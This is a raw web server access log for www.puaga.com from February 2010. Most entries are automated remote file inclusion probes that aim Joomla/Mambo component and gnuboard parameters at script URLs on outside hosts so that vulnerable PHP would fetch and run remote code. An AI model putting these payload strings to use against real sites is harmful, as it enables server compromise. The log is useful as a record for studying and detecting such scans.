84.40.23.86 - - [07/Feb/2010:07:23:43 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:48 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:48 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:23:48 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:07:23:54 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:07:23:55 -0800] "GET /logs/access_100116.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:07:23:55 -0800] "GET /logs/access_100106.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.2.122 - - [07/Feb/2010:07:23:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:10 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:10 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:10 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:17 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:17 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:17 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:18 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:18 -0800] "GET /logs/access_100106.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.40.23.86 - - [07/Feb/2010:07:24:18 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:24:39 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:24:39 -0800] "GET /logs/access_100119.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:24:39 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:28:03 -0800] "GET /logs/access_100119.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:28:03 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:28:03 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:28:03 -0800] "GET /logs/access_100120.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:28:17 -0800] "GET /logs/access_100121.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:28:55 -0800] "GET /logs/access_100121.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:29:05 -0800] "GET /logs/access_100121.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:07:29:05 -0800] "GET /logs/access_090427.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [07/Feb/2010:07:29:07 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_090427.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:29:50 -0800] "GET /logs/access_100124.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:31:21 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:31:25 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:31:25 -0800] "GET /logs/access_100115.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:31:53 -0800] "GET /logs/access_100130.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:07:32:15 -0800] "GET /logs/access_100106.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:07:32:15 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:07:32:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
143.248.146.168 - - [07/Feb/2010:07:32:15 -0800] "GET /logs/access_100116.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:32:33 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:32:33 -0800] "GET /logs/access_100115.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:32:33 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:32:40 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:32:40 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:32:44 -0800] "GET /logs/access_100126.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:32:58 -0800] "GET /logs//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:32:58 -0800] "GET /gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:32:58 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:32:58 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:33:19 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:33:19 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:33:19 -0800] "GET /logs/access_100126.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:33:44 -0800] "GET /logs/access_100130.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:34:48 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:34:48 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:34:48 -0800] "GET /logs/access_100119.log%20%20///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:35:03 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:35:03 -0800] "GET //include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:35:03 -0800] "GET /logs/access_100119.log%20%20///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:19 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:19 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:19 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:28 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:28 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:28 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:28 -0800] "GET /logs/access_091231.log//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:35:37 -0800] "GET /logs/access_091231.log//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:35:38 -0800] "GET /logs/access_100123.log%20%20///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [07/Feb/2010:07:35:55 -0800] "GET /logs/access_100123.log%20%20///include/admin.lib.inc.php?site_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:38:07 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:38:07 -0800] "GET /logs/access_091231.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:38:12 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.43.13.149 - - [07/Feb/2010:07:38:12 -0800] "GET /logs/access_091231.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?%20mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:38:18 -0800] "GET /logs/access_100202.log//gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:38:18 -0800] "GET /logs//gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:38:18 -0800] "GET /gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [07/Feb/2010:07:38:18 -0800] "GET /logs/access_100129.log//gnuboard4/bbs/delete_all.php//gnuboard4/bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:07:39:47 -0800] "GET /logs/access_100107.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:07:39:48 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:07:39:48 -0800] "GET /logs/access_100112.log//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [07/Feb/2010:07:39:48 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:14 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:14 -0800] "GET /logs/access_100113.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:14 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:20 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:20 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:20 -0800] "GET /logs/access_100120.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:20 -0800] "GET /logs/access_100122.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:23 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:23 -0800] "GET /logs/access_100120.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:23 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:32 -0800] "GET /logs/access_100121.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:35 -0800] "GET /logs/access_100121.log%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:07:40:37 -0800] "GET /logs/access_100114.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:07:40:37 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [07/Feb/2010:07:40:38 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:55 -0800] "GET /components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:55 -0800] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [07/Feb/2010:07:40:55 -0800] "GET /logs/access_100120.log//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.caramiagigante.it/cg/modules/xt_conteudo//admin/spaw/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:40:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:40:59 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
91.121.146.197 - - [07/Feb/2010:07:40:59 -0800] "GET /logs/access_091231.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zxl.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
